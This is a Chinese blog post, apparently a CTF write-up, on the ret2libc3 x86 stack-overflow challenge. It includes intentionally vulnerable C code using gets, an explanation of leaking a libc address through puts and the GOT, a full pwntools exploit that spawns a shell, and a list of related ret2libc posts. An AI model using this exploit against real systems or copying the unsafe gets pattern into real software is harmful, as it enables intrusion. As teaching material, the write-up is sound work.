ret2libc3_x86

原创 已于 2025-07-17 03:10:03 修改 · 293 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn #ret2libc #安全

于 2025-07-17 03:09:36 首次发布

 源码

#include <stdio.h>
#include <stdlib.h>

void init() {
	setvbuf(stdout, 0, 2, 0);
	setvbuf(stdin, 0, 1, 0);
	setvbuf(stderr, 0, 1, 0);
}

void vulnfunc() {
	char buf[0x100];
	puts("ret2libc3");
	gets(buf);
}

int main(){	
	init();
	vulnfunc();
}

 漏洞思路

与retlibc2保护相同

ret2libc3中,只有一个gets的溢出,system和“/bin/sh”都需要自己获取。

那从哪里获取呢?

答案是动态链接库中的函数和字符串

偏移公式

vuln_addr - system_addr = libc.symbols["vuln"] - libc.symbols["system"]

写exp

这里要进行两次溢出,第一次先用puts泄漏某个函数(这里是gets)的got地址,然后再用计算出的libc库偏移找到system和“/bin/sh”

先用gdb的vmmap找到库地址

实际题目中常常要用到LibcSearcher之类的小工具来寻找libc库版本

 

 exp

from pwn import *
context(log_level='debug',os='linux',arch='amd64')
p = process("./ret2libc3")
elf = ELF("./ret2libc3")
libc = ELF("/usr/lib/i386-linux-gnu/libc.so.6")

gets_got = elf.got["gets"]
puts_plt = elf.plt["puts"]
main_addr = 0x0804854e
p.recvuntil("ret2libc3\n")
payload1= b"a" * (0x108 + 4)
payload1 += p32(puts_plt) + p32(main_addr) + p32 (gets_got)
p.sendline(payload1)
leak_addr = u32(p.recv(4))
libc_base = leak_addr - libc.symbols["gets"]
libc.address = libc_base
log.success("libc_base:" + hex(libc.address))
system = libc.symbols["system"]
binsh = next(libc.search(b"/bin/sh"))
p.recvuntil("ret2libc3\n")
payload2 = b"a" * (0x108 + 4)
payload2 += p32(system) + b"a"*4 + p32 (binsh)
p.sendline(payload2)
p.interactive()

成功利用

H01mes_
关注
ret2libc3
m0_49959202的博客
08-06 494
文章目录ret2libc31.程序分析2.栈帧设计3.exp编写 ret2libc3 当前的ret2libc3:无system,无”\bin\sh“ 1.程序分析 首先file一下,发现是32位程序: checksec一下,发现没有开启pie ida分析程序: 发现有个See_something()函数可以用来泄露具体给定地址内的信息: main函数内还有个Print_message(),可以用来栈溢出: [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-SKJoX7
Wiki-ret2libc3
TedLau的博客
03-20 614
0x 00 前言 因为libc3里面没有自带的system函数,我的水平又比较低,之前的kali里面没有更新libc-database,导致以为是自己的kali系统的问题,所以一直就没有学这方面的内容,这次更新了ubuntu中的libc-database,从而使得这方面的题目可以正常运行了,所以就来学习了,我觉得正常的比赛中也是不常有带有system函数的,故打算写出来以加深印象。这周再学习...
pwn ——ret2libc3
qq_41696518的博客
07-06 995
ret2libc3
基本ROP之ret2libc3
至臻求学,胸怀云月
02-15 7096
ret2libc思路 ret2libc就是控制函数的执行libc中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容)。一般情况下,我们会选择执行 system("/bin/sh"),因此我们通常需要找到 system 函数的地址。 ret2libc通常可以分为下面这几类: 程序中自身就含有system函数和"/bin/sh"字符串 程序中自身就有s...
ROP-基础-ret2libc3
ATFWUS的博客
02-29 2270
文件下载地址: 链接:https://pan.baidu.com/s/1IMZt9WIlXDZBX2J-hoCyNA 提取码:jrsx 0x01.分析 checksec: Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enab...
pwn】基础ROP攻击实战:ret2libc3
ethan18的博客
07-10 599
这里用来记录一下关于PWN中ROP攻击的各种过程和经验ROP攻击是针对那些使用了NX防护的程序,开启NX防护的程序使得栈以及堆上的代码没有办法被执行,导致不能单独将函数栈中的返回地址修改到函数帧中。ROP主要思想是在栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。讲起来还是很抽象,我的理解就是利用了函数帧中的返回地址,以及具有gadgets(也就是带着ret指令的一段汇编语句)都算是ROP攻击。这里我挑一个最经典的ROP作为实战。
pwn学习-ret2libc3
Sa1nZen的博客
06-30 682
pwn学习-ret2libc3
好好说话之ret2libc3
hollk’s blog
06-22 1764
题目路径: /ctf-challenges/pwn/stackoverflow/ret2libc/ret2libc3 看一下C代码 #include <stdio.h> #include <stdlib.h> #include <time.h> char buf2[100]; void secure(void) { int secretcode, in...
栈溢出实例--笔记三(ret2libc
一只青木呀
08-07 1603
栈溢出实例--笔记三(ret2libc)1、栈溢出含义及栈结构2、ret2libc基本思路3、实战3.1、二进制程序如下3.2、查看栈结构3.3、第一次栈溢出3.4、第二次栈溢出 1、栈溢出含义及栈结构 请参考栈溢出实例–笔记一(ret2text) 栈溢出实例–笔记二(ret2shellcode) 2、ret2libc基本思路 在当一个程序开启了NX(栈不可执行)的时候,我们没办法去写shellcode,而且程序中也没有system函数供我们调用的时候,那此时我们该如何做呢? 首先,程序本身没有system
Pwn学习-ret2libc三联
cdl10000的博客
11-05 429
正常请求ebp要ret至main函数,因此把此间的变量覆盖成其他的函数地址。此处调试过程需要注意,输入的位置是gets函数,要继续调试至main函数再查看stack,计算此时的偏移量,偏移量为112。此题目与上一题最大的区别就是没有/bin/sh,那么结合攻击思路,需要写一个/bin/sh进去执行。调试过程中有坑,需要一个地址能够写进程序,使用IDA调试,发现buf2函数可以写入。继续跟进调试,直至ret至下个main函数,再查看stack。思路一样,减少找函数的过程,提升解题效率。
Ret2libc
iextract的博客
04-24 716
昨晚同学问了关于ret2libc时参数布置的问题,今天在此记录 假设熟悉stack overflow Ps:ret2libc是为了对抗DEP/NX产生 栈的布置在说明ret2libc之前,栈的布置需要提前说明一下,以以下简单代码为例#include <stdio.h>int trap(int x) { int y=0; y+=x; return y; }int m
从零开始学逆向:理解ret2libc-3
weixin_44626085的博客
02-20 1628
题目下载链接:https://pan.baidu.com/s/1wk3JFQBHgVZ0vjfnQk60Ug 提取码:0000。
2019.7.25 ret2libc3 填充从112遍为104
DSR446的博客
08-17 568
这道题目存在栈溢出,没有system函数,/bin/sh,需要我们自己泄露,解题思路跟前一篇博客的思路是一样的。讲一下怎么用libc的相对路径。 着重讲一下为什么开始的填充是112,后面填充变为了104。主要是程序为了对齐。我们可以用gdb来调试一下,来看看他变化的过程。 变化前: 变化后: 放exp: ...
栈溢出入门0x07 ret2libc3&Hijack GOT
最新发布
砖家
10-04 1113
使用patchelf保证ret2libc3的实验结果一致性,先泄露函数地址后得到libc版本和加载基地址之后计算出system和/bin/sh的真实加载地址,从而getshell
ret2libc3地址泄露--pwn
weixin_44642009的博客
03-17 2898
练习三–ret2libc3地址泄露 在此实验前,我们从简到难实验了ret2libc1,ret2libc2两个实验,对getshell有了一定了解,基本学会了如何在有无system及/bin/sh函数的情况下获取权限,在此以实验二的名为pwn的可执行文件为入手点,进行getshell。 首先,对ret2libc3可执行文件进行检测, checksec ret2libc3 结果如图: 发现其不存...
适合新手的ret2libc3之路
Vicl1fe的博客
05-29 4102
rop之libc3 做了一下这道题,感觉收获蛮大,写一篇博客,也方便自己记忆。 题目链接:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/basic-rop/#3 参考链接:https://www.jianshu.com/p/5525dde00053 好了回归正题,首先拿到这个题目,ida打开按f5查看伪代码,看到了高危函数...
pwn入门:基本栈溢出之ret2libc详解(以32位+64位程序为例)
热门推荐
Bossfrank的博客
12-08 1万+
本文详解了pwn题目中ret2libc的解题思路。简要介绍了plt表和got表的意义以及Linux中的延迟绑定技术,并通过32位和64位的两个具体题目具体的介绍了解pwn题的完整过程。
实验三——ret2libc3地址泄露
wwh的博客
04-22 2028
用【checksec】查看:不存在必要的保护 查看got表信息:【readelf -r ret2libc3】 所以我决定用泄露 __libc_strart_main 的地址,来判定libc的版本 这里插入代码 from pwn import * from LibcSearcher import * context.log_level='debug' context.terminal=['gn...
ret2libc3_通过 ROP 绕过 DEP 和 ASLR 防护
Jc
05-08 923
题目:link > 2jfn 引 ROP的全称为 Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。 常见的程序流劫持就是栈溢出,格式化字符串攻击和堆溢出。 通过程序流劫持,攻击者可以控制PC指针从而执行目标代码。为了应对这种攻击,系统防御者也提出了各种防御方法,最常见的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值